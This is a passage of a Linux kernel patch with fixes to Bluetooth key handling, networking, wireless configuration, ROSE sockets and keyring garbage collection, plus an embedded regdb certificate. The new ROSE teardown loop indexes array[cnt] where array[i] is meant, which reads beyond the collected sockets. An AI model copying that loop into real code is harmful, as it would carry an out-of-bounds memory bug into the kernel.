+ static inline void l2cap_sig_channel(struct l2cap_conn *conn,
+ 				     struct sk_buff *skb)
+ {
+@@ -6518,23 +6526,24 @@ static inline void l2cap_sig_channel(struct l2cap_conn *conn,
+ 
+ 		if (len > skb->len || !cmd->ident) {
+ 			BT_DBG("corrupted command");
++			l2cap_sig_send_rej(conn, cmd->ident);
+ 			break;
+ 		}
+ 
+ 		err = l2cap_bredr_sig_cmd(conn, cmd, len, skb->data);
+ 		if (err) {
+-			struct l2cap_cmd_rej_unk rej;
+-
+ 			BT_ERR("Wrong link type (%d)", err);
+-
+-			rej.reason = cpu_to_le16(L2CAP_REJ_NOT_UNDERSTOOD);
+-			l2cap_send_cmd(conn, cmd->ident, L2CAP_COMMAND_REJ,
+-				       sizeof(rej), &rej);
++			l2cap_sig_send_rej(conn, cmd->ident);
+ 		}
+ 
+ 		skb_pull(skb, len);
+ 	}
+ 
++	if (skb->len > 0) {
++		BT_DBG("corrupted command");
++		l2cap_sig_send_rej(conn, 0);
++	}
++
+ drop:
+ 	kfree_skb(skb);
+ }
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index d2e8565d0b33f..6d631a2e60166 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -2883,7 +2883,8 @@ static int load_link_keys(struct sock *sk, struct hci_dev *hdev, void *data,
+ 	for (i = 0; i < key_count; i++) {
+ 		struct mgmt_link_key_info *key = &cp->keys[i];
+ 
+-		if (key->addr.type != BDADDR_BREDR || key->type > 0x08)
++		/* Considering SMP over BREDR/LE, there is no need to check addr_type */
++		if (key->type > 0x08)
+ 			return mgmt_cmd_status(sk, hdev->id,
+ 					       MGMT_OP_LOAD_LINK_KEYS,
+ 					       MGMT_STATUS_INVALID_PARAMS);
+@@ -7129,6 +7130,7 @@ static int load_irks(struct sock *sk, struct hci_dev *hdev, void *cp_data,
+ 
+ 	for (i = 0; i < irk_count; i++) {
+ 		struct mgmt_irk_info *irk = &cp->irks[i];
++		u8 addr_type = le_addr_type(irk->addr.type);
+ 
+ 		if (hci_is_blocked_key(hdev,
+ 				       HCI_BLOCKED_KEY_TYPE_IRK,
+@@ -7138,8 +7140,12 @@ static int load_irks(struct sock *sk, struct hci_dev *hdev, void *cp_data,
+ 			continue;
+ 		}
+ 
++		/* When using SMP over BR/EDR, the addr type should be set to BREDR */
++		if (irk->addr.type == BDADDR_BREDR)
++			addr_type = BDADDR_BREDR;
++
+ 		hci_add_irk(hdev, &irk->addr.bdaddr,
+-			    le_addr_type(irk->addr.type), irk->val,
++			    addr_type, irk->val,
+ 			    BDADDR_ANY);
+ 	}
+ 
+@@ -7220,6 +7226,7 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 	for (i = 0; i < key_count; i++) {
+ 		struct mgmt_ltk_info *key = &cp->keys[i];
+ 		u8 type, authenticated;
++		u8 addr_type = le_addr_type(key->addr.type);
+ 
+ 		if (hci_is_blocked_key(hdev,
+ 				       HCI_BLOCKED_KEY_TYPE_LTK,
+@@ -7254,8 +7261,12 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 			continue;
+ 		}
+ 
++		/* When using SMP over BR/EDR, the addr type should be set to BREDR */
++		if (key->addr.type == BDADDR_BREDR)
++			addr_type = BDADDR_BREDR;
++
+ 		hci_add_ltk(hdev, &key->addr.bdaddr,
+-			    le_addr_type(key->addr.type), type, authenticated,
++			    addr_type, type, authenticated,
+ 			    key->val, key->enc_size, key->ediv, key->rand);
+ 	}
+ 
+@@ -9523,7 +9534,7 @@ void mgmt_new_link_key(struct hci_dev *hdev, struct link_key *key,
+ 
+ 	ev.store_hint = persistent;
+ 	bacpy(&ev.key.addr.bdaddr, &key->bdaddr);
+-	ev.key.addr.type = BDADDR_BREDR;
++	ev.key.addr.type = link_to_bdaddr(key->link_type, key->bdaddr_type);
+ 	ev.key.type = key->type;
+ 	memcpy(ev.key.val, key->val, HCI_LINK_KEY_SIZE);
+ 	ev.key.pin_len = key->pin_len;
+@@ -9574,7 +9585,7 @@ void mgmt_new_ltk(struct hci_dev *hdev, struct smp_ltk *key, bool persistent)
+ 		ev.store_hint = persistent;
+ 
+ 	bacpy(&ev.key.addr.bdaddr, &key->bdaddr);
+-	ev.key.addr.type = link_to_bdaddr(LE_LINK, key->bdaddr_type);
++	ev.key.addr.type = link_to_bdaddr(key->link_type, key->bdaddr_type);
+ 	ev.key.type = mgmt_ltk_type(key);
+ 	ev.key.enc_size = key->enc_size;
+ 	ev.key.ediv = key->ediv;
+@@ -9603,7 +9614,7 @@ void mgmt_new_irk(struct hci_dev *hdev, struct smp_irk *irk, bool persistent)
+ 
+ 	bacpy(&ev.rpa, &irk->rpa);
+ 	bacpy(&ev.irk.addr.bdaddr, &irk->bdaddr);
+-	ev.irk.addr.type = link_to_bdaddr(LE_LINK, irk->addr_type);
++	ev.irk.addr.type = link_to_bdaddr(irk->link_type, irk->addr_type);
+ 	memcpy(ev.irk.val, irk->val, sizeof(irk->val));
+ 
+ 	mgmt_event(MGMT_EV_NEW_IRK, hdev, &ev, sizeof(ev), NULL);
+@@ -9632,7 +9643,7 @@ void mgmt_new_csrk(struct hci_dev *hdev, struct smp_csrk *csrk,
+ 		ev.store_hint = persistent;
+ 
+ 	bacpy(&ev.key.addr.bdaddr, &csrk->bdaddr);
+-	ev.key.addr.type = link_to_bdaddr(LE_LINK, csrk->bdaddr_type);
++	ev.key.addr.type = link_to_bdaddr(csrk->link_type, csrk->bdaddr_type);
+ 	ev.key.type = csrk->type;
+ 	memcpy(ev.key.val, csrk->val, sizeof(csrk->val));
+ 
+diff --git a/net/bluetooth/smp.c b/net/bluetooth/smp.c
+index 70663229b3cc9..ecb005bce65ac 100644
+--- a/net/bluetooth/smp.c
++++ b/net/bluetooth/smp.c
+@@ -1058,6 +1058,7 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 	}
+ 
+ 	if (smp->remote_irk) {
++		smp->remote_irk->link_type = hcon->type;
+ 		mgmt_new_irk(hdev, smp->remote_irk, persistent);
+ 
+ 		/* Now that user space can be considered to know the
+@@ -1072,24 +1073,28 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 	}
+ 
+ 	if (smp->csrk) {
++		smp->csrk->link_type = hcon->type;
+ 		smp->csrk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->csrk->bdaddr, &hcon->dst);
+ 		mgmt_new_csrk(hdev, smp->csrk, persistent);
+ 	}
+ 
+ 	if (smp->responder_csrk) {
++		smp->responder_csrk->link_type = hcon->type;
+ 		smp->responder_csrk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->responder_csrk->bdaddr, &hcon->dst);
+ 		mgmt_new_csrk(hdev, smp->responder_csrk, persistent);
+ 	}
+ 
+ 	if (smp->ltk) {
++		smp->ltk->link_type = hcon->type;
+ 		smp->ltk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->ltk->bdaddr, &hcon->dst);
+ 		mgmt_new_ltk(hdev, smp->ltk, persistent);
+ 	}
+ 
+ 	if (smp->responder_ltk) {
++		smp->responder_ltk->link_type = hcon->type;
+ 		smp->responder_ltk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->responder_ltk->bdaddr, &hcon->dst);
+ 		mgmt_new_ltk(hdev, smp->responder_ltk, persistent);
+@@ -1109,6 +1114,8 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 		key = hci_add_link_key(hdev, smp->conn->hcon, &hcon->dst,
+ 				       smp->link_key, type, 0, &persistent);
+ 		if (key) {
++			key->link_type = hcon->type;
++			key->bdaddr_type = hcon->dst_type;
+ 			mgmt_new_link_key(hdev, key, persistent);
+ 
+ 			/* Don't keep debug keys around if the relevant
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 0d5aa820fd830..0a5566b6f8a25 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3551,6 +3551,9 @@ static netdev_features_t gso_features_check(const struct sk_buff *skb,
+ 	if (gso_segs > READ_ONCE(dev->gso_max_segs))
+ 		return features & ~NETIF_F_GSO_MASK;
+ 
++	if (unlikely(skb->len >= READ_ONCE(dev->gso_max_size)))
++		return features & ~NETIF_F_GSO_MASK;
++
+ 	if (!skb_shinfo(skb)->gso_type) {
+ 		skb_warn_bad_offload(skb);
+ 		return features & ~NETIF_F_GSO_MASK;
+diff --git a/net/core/stream.c b/net/core/stream.c
+index 051aa71a8ad0f..30e7deff4c551 100644
+--- a/net/core/stream.c
++++ b/net/core/stream.c
+@@ -79,7 +79,7 @@ int sk_stream_wait_connect(struct sock *sk, long *timeo_p)
+ 		remove_wait_queue(sk_sleep(sk), &wait);
+ 		sk->sk_write_pending--;
+ 	} while (!done);
+-	return 0;
++	return done < 0 ? done : 0;
+ }
+ EXPORT_SYMBOL(sk_stream_wait_connect);
+ 
+diff --git a/net/dns_resolver/dns_key.c b/net/dns_resolver/dns_key.c
+index 3aced951d5ab8..03f8f33dc134c 100644
+--- a/net/dns_resolver/dns_key.c
++++ b/net/dns_resolver/dns_key.c
+@@ -91,6 +91,7 @@ const struct cred *dns_resolver_cache;
+ static int
+ dns_resolver_preparse(struct key_preparsed_payload *prep)
+ {
++	const struct dns_server_list_v1_header *v1;
+ 	const struct dns_payload_header *bin;
+ 	struct user_key_payload *upayload;
+ 	unsigned long derrno;
+@@ -122,6 +123,13 @@ dns_resolver_preparse(struct key_preparsed_payload *prep)
+ 			return -EINVAL;
+ 		}
+ 
++		v1 = (const struct dns_server_list_v1_header *)bin;
++		if ((v1->status != DNS_LOOKUP_GOOD &&
++		     v1->status != DNS_LOOKUP_GOOD_WITH_BAD)) {
++			if (prep->expiry == TIME64_MAX)
++				prep->expiry = ktime_get_real_seconds() + 1;
++		}
++
+ 		result_len = datalen;
+ 		goto store_result;
+ 	}
+@@ -314,7 +322,7 @@ static long dns_resolver_read(const struct key *key,
+ 
+ struct key_type key_type_dns_resolver = {
+ 	.name		= "dns_resolver",
+-	.flags		= KEY_TYPE_NET_DOMAIN,
++	.flags		= KEY_TYPE_NET_DOMAIN | KEY_TYPE_INSTANT_REAP,
+ 	.preparse	= dns_resolver_preparse,
+ 	.free_preparse	= dns_resolver_free_preparse,
+ 	.instantiate	= generic_key_instantiate,
+diff --git a/net/ife/ife.c b/net/ife/ife.c
+index 13bbf8cb6a396..be05b690b9ef2 100644
+--- a/net/ife/ife.c
++++ b/net/ife/ife.c
+@@ -82,6 +82,7 @@ void *ife_decode(struct sk_buff *skb, u16 *metalen)
+ 	if (unlikely(!pskb_may_pull(skb, total_pull)))
+ 		return NULL;
+ 
++	ifehdr = (struct ifeheadr *)(skb->data + skb->dev->hard_header_len);
+ 	skb_set_mac_header(skb, total_pull);
+ 	__skb_pull(skb, total_pull);
+ 	*metalen = ifehdrln - IFE_METAHDRLEN;
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 2ca442f485132..a2c4866080bd7 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -1694,10 +1694,10 @@ static int sta_link_apply_parameters(struct ieee80211_local *local,
+ 					  lockdep_is_held(&local->sta_mtx));
+ 
+ 	/*
+-	 * If there are no changes, then accept a link that doesn't exist,
++	 * If there are no changes, then accept a link that exists,
+ 	 * unless it's a new link.
+ 	 */
+-	if (params->link_id < 0 && !new_link &&
++	if (params->link_id >= 0 && !new_link &&
+ 	    !params->link_mac && !params->txpwr_set &&
+ 	    !params->supported_rates_len &&
+ 	    !params->ht_capa && !params->vht_capa &&
+diff --git a/net/mac80211/mesh_plink.c b/net/mac80211/mesh_plink.c
+index bd0b7c189adfa..711c3377f428b 100644
+--- a/net/mac80211/mesh_plink.c
++++ b/net/mac80211/mesh_plink.c
+@@ -1051,8 +1051,8 @@ mesh_plink_get_event(struct ieee80211_sub_if_data *sdata,
+ 	case WLAN_SP_MESH_PEERING_OPEN:
+ 		if (!matches_local)
+ 			event = OPN_RJCT;
+-		if (!mesh_plink_free_count(sdata) ||
+-		    (sta->mesh->plid && sta->mesh->plid != plid))
++		else if (!mesh_plink_free_count(sdata) ||
++			 (sta->mesh->plid && sta->mesh->plid != plid))
+ 			event = OPN_IGNR;
+ 		else
+ 			event = OPN_ACPT;
+@@ -1060,9 +1060,9 @@ mesh_plink_get_event(struct ieee80211_sub_if_data *sdata,
+ 	case WLAN_SP_MESH_PEERING_CONFIRM:
+ 		if (!matches_local)
+ 			event = CNF_RJCT;
+-		if (!mesh_plink_free_count(sdata) ||
+-		    sta->mesh->llid != llid ||
+-		    (sta->mesh->plid && sta->mesh->plid != plid))
++		else if (!mesh_plink_free_count(sdata) ||
++			 sta->mesh->llid != llid ||
++			 (sta->mesh->plid && sta->mesh->plid != plid))
+ 			event = CNF_IGNR;
+ 		else
+ 			event = CNF_ACPT;
+@@ -1230,6 +1230,8 @@ void mesh_rx_plink_frame(struct ieee80211_sub_if_data *sdata,
+ 			return;
+ 	}
+ 	elems = ieee802_11_parse_elems(baseaddr, len - baselen, true, NULL);
+-	mesh_process_plink_frame(sdata, mgmt, elems, rx_status);
+-	kfree(elems);
++	if (elems) {
++		mesh_process_plink_frame(sdata, mgmt, elems, rx_status);
++		kfree(elems);
++	}
+ }
+diff --git a/net/rfkill/rfkill-gpio.c b/net/rfkill/rfkill-gpio.c
+index 2cc95c8dc4c7b..f74baefd855d3 100644
+--- a/net/rfkill/rfkill-gpio.c
++++ b/net/rfkill/rfkill-gpio.c
+@@ -116,6 +116,14 @@ static int rfkill_gpio_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
++	ret = gpiod_direction_output(rfkill->reset_gpio, true);
++	if (ret)
++		return ret;
++
++	ret = gpiod_direction_output(rfkill->shutdown_gpio, true);
++	if (ret)
++		return ret;
++
+ 	rfkill->rfkill_dev = rfkill_alloc(rfkill->name, &pdev->dev,
+ 					  rfkill->type, &rfkill_gpio_ops,
+ 					  rfkill);
+diff --git a/net/rose/af_rose.c b/net/rose/af_rose.c
+index 674937284b8d2..29b74a569e0b0 100644
+--- a/net/rose/af_rose.c
++++ b/net/rose/af_rose.c
+@@ -182,21 +182,47 @@ void rose_kill_by_neigh(struct rose_neigh *neigh)
+  */
+ static void rose_kill_by_device(struct net_device *dev)
+ {
+-	struct sock *s;
++	struct sock *sk, *array[16];
++	struct rose_sock *rose;
++	bool rescan;
++	int i, cnt;
+ 
++start:
++	rescan = false;
++	cnt = 0;
+ 	spin_lock_bh(&rose_list_lock);
+-	sk_for_each(s, &rose_list) {
+-		struct rose_sock *rose = rose_sk(s);
++	sk_for_each(sk, &rose_list) {
++		rose = rose_sk(sk);
++		if (rose->device == dev) {
++			if (cnt == ARRAY_SIZE(array)) {
++				rescan = true;
++				break;
++			}
++			sock_hold(sk);
++			array[cnt++] = sk;
++		}
++	}
++	spin_unlock_bh(&rose_list_lock);
+ 
++	for (i = 0; i < cnt; i++) {
++		sk = array[cnt];
++		rose = rose_sk(sk);
++		lock_sock(sk);
++		spin_lock_bh(&rose_list_lock);
+ 		if (rose->device == dev) {
+-			rose_disconnect(s, ENETUNREACH, ROSE_OUT_OF_ORDER, 0);
++			rose_disconnect(sk, ENETUNREACH, ROSE_OUT_OF_ORDER, 0);
+ 			if (rose->neighbour)
+ 				rose->neighbour->use--;
+ 			netdev_put(rose->device, &rose->dev_tracker);
+ 			rose->device = NULL;
+ 		}
++		spin_unlock_bh(&rose_list_lock);
++		release_sock(sk);
++		sock_put(sk);
++		cond_resched();
+ 	}
+-	spin_unlock_bh(&rose_list_lock);
++	if (rescan)
++		goto start;
+ }
+ 
+ /*
+@@ -656,7 +682,10 @@ static int rose_release(struct socket *sock)
+ 		break;
+ 	}
+ 
++	spin_lock_bh(&rose_list_lock);
+ 	netdev_put(rose->device, &rose->dev_tracker);
++	rose->device = NULL;
++	spin_unlock_bh(&rose_list_lock);
+ 	sock->sk = NULL;
+ 	release_sock(sk);
+ 	sock_put(sk);
+diff --git a/net/wireless/certs/wens.hex b/net/wireless/certs/wens.hex
+new file mode 100644
+index 0000000000000..0d50369bede98
+--- /dev/null
++++ b/net/wireless/certs/wens.hex
+@@ -0,0 +1,87 @@
++/* Chen-Yu Tsai's regdb certificate */
++0x30, 0x82, 0x02, 0xa7, 0x30, 0x82, 0x01, 0x8f,
++0x02, 0x14, 0x61, 0xc0, 0x38, 0x65, 0x1a, 0xab,
++0xdc, 0xf9, 0x4b, 0xd0, 0xac, 0x7f, 0xf0, 0x6c,
++0x72, 0x48, 0xdb, 0x18, 0xc6, 0x00, 0x30, 0x0d,
++0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d,
++0x01, 0x01, 0x0b, 0x05, 0x00, 0x30, 0x0f, 0x31,
++0x0d, 0x30, 0x0b, 0x06, 0x03, 0x55, 0x04, 0x03,
++0x0c, 0x04, 0x77, 0x65, 0x6e, 0x73, 0x30, 0x20,
++0x17, 0x0d, 0x32, 0x33, 0x31, 0x32, 0x30, 0x31,
++0x30, 0x37, 0x34, 0x31, 0x31, 0x34, 0x5a, 0x18,
++0x0f, 0x32, 0x31, 0x32, 0x33, 0x31, 0x31, 0x30,
++0x37, 0x30, 0x37, 0x34, 0x31, 0x31, 0x34, 0x5a,
++0x30, 0x0f, 0x31, 0x0d, 0x30, 0x0b, 0x06, 0x03,
++0x55, 0x04, 0x03, 0x0c, 0x04, 0x77, 0x65, 0x6e,
++0x73, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0d, 0x06,
++0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x0d, 0x01,
++0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0f,
++0x00, 0x30, 0x82, 0x01, 0x0a, 0x02, 0x82, 0x01,
++0x01, 0x00, 0xa9, 0x7a, 0x2c, 0x78, 0x4d, 0xa7,
++0x19, 0x2d, 0x32, 0x52, 0xa0, 0x2e, 0x6c, 0xef,
++0x88, 0x7f, 0x15, 0xc5, 0xb6, 0x69, 0x54, 0x16,
++0x43, 0x14, 0x79, 0x53, 0xb7, 0xae, 0x88, 0xfe,
++0xc0, 0xb7, 0x5d, 0x47, 0x8e, 0x1a, 0xe1, 0xef,
++0xb3, 0x90, 0x86, 0xda, 0xd3, 0x64, 0x81, 0x1f,
++0xce, 0x5d, 0x9e, 0x4b, 0x6e, 0x58, 0x02, 0x3e,
++0xb2, 0x6f, 0x5e, 0x42, 0x47, 0x41, 0xf4, 0x2c,
++0xb8, 0xa8, 0xd4, 0xaa, 0xc0, 0x0e, 0xe6, 0x48,
++0xf0, 0xa8, 0xce, 0xcb, 0x08, 0xae, 0x37, 0xaf,
++0xf6, 0x40, 0x39, 0xcb, 0x55, 0x6f, 0x5b, 0x4f,
++0x85, 0x34, 0xe6, 0x69, 0x10, 0x50, 0x72, 0x5e,
++0x4e, 0x9d, 0x4c, 0xba, 0x38, 0x36, 0x0d, 0xce,
++0x73, 0x38, 0xd7, 0x27, 0x02, 0x2a, 0x79, 0x03,
++0xe1, 0xac, 0xcf, 0xb0, 0x27, 0x85, 0x86, 0x93,
++0x17, 0xab, 0xec, 0x42, 0x77, 0x37, 0x65, 0x8a,
++0x44, 0xcb, 0xd6, 0x42, 0x93, 0x92, 0x13, 0xe3,
++0x39, 0x45, 0xc5, 0x6e, 0x00, 0x4a, 0x7f, 0xcb,
++0x42, 0x17, 0x2b, 0x25, 0x8c, 0xb8, 0x17, 0x3b,
++0x15, 0x36, 0x59, 0xde, 0x42, 0xce, 0x21, 0xe6,
++0xb6, 0xc7, 0x6e, 0x5e, 0x26, 0x1f, 0xf7, 0x8a,
++0x57, 0x9e, 0xa5, 0x96, 0x72, 0xb7, 0x02, 0x32,
++0xeb, 0x07, 0x2b, 0x73, 0xe2, 0x4f, 0x66, 0x58,
++0x9a, 0xeb, 0x0f, 0x07, 0xb6, 0xab, 0x50, 0x8b,
++0xc3, 0x8f, 0x17, 0xfa, 0x0a, 0x99, 0xc2, 0x16,
++0x25, 0xbf, 0x2d, 0x6b, 0x1a, 0xaa, 0xe6, 0x3e,
++0x5f, 0xeb, 0x6d, 0x9b, 0x5d, 0x4d, 0x42, 0x83,
++0x2d, 0x39, 0xb8, 0xc9, 0xac, 0xdb, 0x3a, 0x91,
++0x50, 0xdf, 0xbb, 0xb1, 0x76, 0x6d, 0x15, 0x73,
++0xfd, 0xc6, 0xe6, 0x6b, 0x71, 0x9e, 0x67, 0x36,
++0x22, 0x83, 0x79, 0xb1, 0xd6, 0xb8, 0x84, 0x52,
++0xaf, 0x96, 0x5b, 0xc3, 0x63, 0x02, 0x4e, 0x78,
++0x70, 0x57, 0x02, 0x03, 0x01, 0x00, 0x01, 0x30,
++0x0d, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7,
++0x0d, 0x01, 0x01, 0x0b, 0x05, 0x00, 0x03, 0x82,
++0x01, 0x01, 0x00, 0x24, 0x28, 0xee, 0x22, 0x74,
++0x7f, 0x7c, 0xfa, 0x6c, 0x1f, 0xb3, 0x18, 0xd1,
++0xc2, 0x3d, 0x7d, 0x29, 0x42, 0x88, 0xad, 0x82,
++0xa5, 0xb1, 0x8a, 0x05, 0xd0, 0xec, 0x5c, 0x91,
++0x20, 0xf6, 0x82, 0xfd, 0xd5, 0x67, 0x60, 0x5f,
++0x31, 0xf5, 0xbd, 0x88, 0x91, 0x70, 0xbd, 0xb8,
++0xb9, 0x8c, 0x88, 0xfe, 0x53, 0xc9, 0x54, 0x9b,
++0x43, 0xc4, 0x7a, 0x43, 0x74, 0x6b, 0xdd, 0xb0,
++0xb1, 0x3b, 0x33, 0x45, 0x46, 0x78, 0xa3, 0x1c,
++0xef, 0x54, 0x68, 0xf7, 0x85, 0x9c, 0xe4, 0x51,
++0x6f, 0x06, 0xaf, 0x81, 0xdb, 0x2a, 0x7b, 0x7b,
++0x6f, 0xa8, 0x9c, 0x67, 0xd8, 0xcb, 0xc9, 0x91,
++0x40, 0x00, 0xae, 0xd9, 0xa1, 0x9f, 0xdd, 0xa6,
++0x43, 0x0e, 0x28, 0x7b, 0xaa, 0x1b, 0xe9, 0x84,
++0xdb, 0x76, 0x64, 0x42, 0x70, 0xc9, 0xc0, 0xeb,
++0xae, 0x84, 0x11, 0x16, 0x68, 0x4e, 0x84, 0x9e,
++0x7e, 0x92, 0x36, 0xee, 0x1c, 0x3b, 0x08, 0x63,
++0xeb, 0x79, 0x84, 0x15, 0x08, 0x9d, 0xaf, 0xc8,
++0x9a, 0xc7, 0x34, 0xd3, 0x94, 0x4b, 0xd1, 0x28,
++0x97, 0xbe, 0xd1, 0x45, 0x75, 0xdc, 0x35, 0x62,
++0xac, 0x1d, 0x1f, 0xb7, 0xb7, 0x15, 0x87, 0xc8,
++0x98, 0xc0, 0x24, 0x31, 0x56, 0x8d, 0xed, 0xdb,
++0x06, 0xc6, 0x46, 0xbf, 0x4b, 0x6d, 0xa6, 0xd5,
++0xab, 0xcc, 0x60, 0xfc, 0xe5, 0x37, 0xb6, 0x53,
++0x7d, 0x58, 0x95, 0xa9, 0x56, 0xc7, 0xf7, 0xee,
++0xc3, 0xa0, 0x76, 0xf7, 0x65, 0x4d, 0x53, 0xfa,
++0xff, 0x5f, 0x76, 0x33, 0x5a, 0x08, 0xfa, 0x86,
++0x92, 0x5a, 0x13, 0xfa, 0x1a, 0xfc, 0xf2, 0x1b,
++0x8c, 0x7f, 0x42, 0x6d, 0xb7, 0x7e, 0xb7, 0xb4,
++0xf0, 0xc7, 0x83, 0xbb, 0xa2, 0x81, 0x03, 0x2d,
++0xd4, 0x2a, 0x63, 0x3f, 0xf7, 0x31, 0x2e, 0x40,
++0x33, 0x5c, 0x46, 0xbc, 0x9b, 0xc1, 0x05, 0xa5,
++0x45, 0x4e, 0xc3,
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index e1accacc6f233..ee980965a7cfb 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -297,6 +297,7 @@ struct cfg80211_cqm_config {
+ 	u32 rssi_hyst;
+ 	s32 last_rssi_event_value;
+ 	enum nl80211_cqm_rssi_threshold_event last_rssi_event_type;
++	bool use_range_api;
+ 	int n_rssi_thresholds;
+ 	s32 rssi_thresholds[];
+ };
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index b19b5acfaf3a9..70fb14b8bab07 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -12574,10 +12574,6 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 	int i, n, low_index;
+ 	int err;
+ 
+-	/* RSSI reporting disabled? */
+-	if (!cqm_config)
+-		return rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
+-
+ 	/*
+ 	 * Obtain current RSSI value if possible, if not and no RSSI threshold
+ 	 * event has been received yet, we should receive an event after a
+@@ -12652,18 +12648,6 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	    wdev->iftype != NL80211_IFTYPE_P2P_CLIENT)
+ 		return -EOPNOTSUPP;
+ 
+-	if (n_thresholds <= 1 && rdev->ops->set_cqm_rssi_config) {
+-		if (n_thresholds == 0 || thresholds[0] == 0) /* Disabling */
+-			return rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+-
+-		return rdev_set_cqm_rssi_config(rdev, dev,
+-						thresholds[0], hysteresis);
+-	}
+-
+-	if (!wiphy_ext_feature_isset(&rdev->wiphy,
+-				     NL80211_EXT_FEATURE_CQM_RSSI_LIST))
+-		return -EOPNOTSUPP;
+-
+ 	if (n_thresholds == 1 && thresholds[0] == 0) /* Disabling */
+ 		n_thresholds = 0;
+ 
+@@ -12671,6 +12655,26 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	old = rcu_dereference_protected(wdev->cqm_config,
+ 					lockdep_is_held(&wdev->mtx));
+ 
++	/* if already disabled just succeed */
++	if (!n_thresholds && !old) {
++		err = 0;
++		goto unlock;
++	}
++
++	if (n_thresholds > 1) {
++		if (!wiphy_ext_feature_isset(&rdev->wiphy,
++					     NL80211_EXT_FEATURE_CQM_RSSI_LIST) ||
++		    !rdev->ops->set_cqm_rssi_range_config) {
++			err = -EOPNOTSUPP;
++			goto unlock;
++		}
++	} else {
++		if (!rdev->ops->set_cqm_rssi_config) {
++			err = -EOPNOTSUPP;
++			goto unlock;
++		}
++	}
++
+ 	if (n_thresholds) {
+ 		cqm_config = kzalloc(struct_size(cqm_config, rssi_thresholds,
+ 						 n_thresholds),
+@@ -12685,13 +12689,26 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 		memcpy(cqm_config->rssi_thresholds, thresholds,
+ 		       flex_array_size(cqm_config, rssi_thresholds,
+ 				       n_thresholds));
++		cqm_config->use_range_api = n_thresholds > 1 ||
++					    !rdev->ops->set_cqm_rssi_config;
+ 
+ 		rcu_assign_pointer(wdev->cqm_config, cqm_config);
++
++		if (cqm_config->use_range_api)
++			err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
++		else
++			err = rdev_set_cqm_rssi_config(rdev, dev,
++						       thresholds[0],
++						       hysteresis);
+ 	} else {
+ 		RCU_INIT_POINTER(wdev->cqm_config, NULL);
++		/* if enabled as range also disable via range */
++		if (old->use_range_api)
++			err = rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
++		else
++			err = rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+ 	}
+ 
+-	err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
+ 	if (err) {
+ 		rcu_assign_pointer(wdev->cqm_config, old);
+ 		kfree_rcu(cqm_config, rcu_head);
+@@ -18758,10 +18775,11 @@ void cfg80211_cqm_rssi_notify_work(struct wiphy *wiphy, struct wiphy_work *work)
+ 	wdev_lock(wdev);
+ 	cqm_config = rcu_dereference_protected(wdev->cqm_config,
+ 					       lockdep_is_held(&wdev->mtx));
+-	if (!wdev->cqm_config)
++	if (!cqm_config)
+ 		goto unlock;
+ 
+-	cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
++	if (cqm_config->use_range_api)
++		cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
+ 
+ 	rssi_level = cqm_config->last_rssi_event_value;
+ 	rssi_event = cqm_config->last_rssi_event_type;
+diff --git a/security/keys/gc.c b/security/keys/gc.c
+index 3c90807476eb0..eaddaceda14ea 100644
+--- a/security/keys/gc.c
++++ b/security/keys/gc.c
+@@ -66,6 +66,19 @@ void key_schedule_gc(time64_t gc_at)
+ 	}
+ }
+ 
++/*
++ * Set the expiration time on a key.
++ */
++void key_set_expiry(struct key *key, time64_t expiry)
++{
++	key->expiry = expiry;
++	if (expiry != TIME64_MAX) {
++		if (!(key->type->flags & KEY_TYPE_INSTANT_REAP))
++			expiry += key_gc_delay;
++		key_schedule_gc(expiry);
++	}
++}
++
+ /*
+  * Schedule a dead links collection run.
+  */
+@@ -176,7 +189,6 @@ static void key_garbage_collector(struct work_struct *work)
+ 	static u8 gc_state;		/* Internal persistent state */
+ #define KEY_GC_REAP_AGAIN	0x01	/* - Need another cycle */
+ #define KEY_GC_REAPING_LINKS	0x02	/* - We need to reap links */
+-#define KEY_GC_SET_TIMER	0x04	/* - We need to restart the timer */
+ #define KEY_GC_REAPING_DEAD_1	0x10	/* - We need to mark dead keys */
+ #define KEY_GC_REAPING_DEAD_2	0x20	/* - We need to reap dead key links */
+ #define KEY_GC_REAPING_DEAD_3	0x40	/* - We need to reap dead keys */
+@@ -184,21 +196,17 @@ static void key_garbage_collector(struct work_struct *work)
+ 
+ 	struct rb_node *cursor;
+ 	struct key *key;
+-	time64_t new_timer, limit;
++	time64_t new_timer, limit, expiry;
+ 
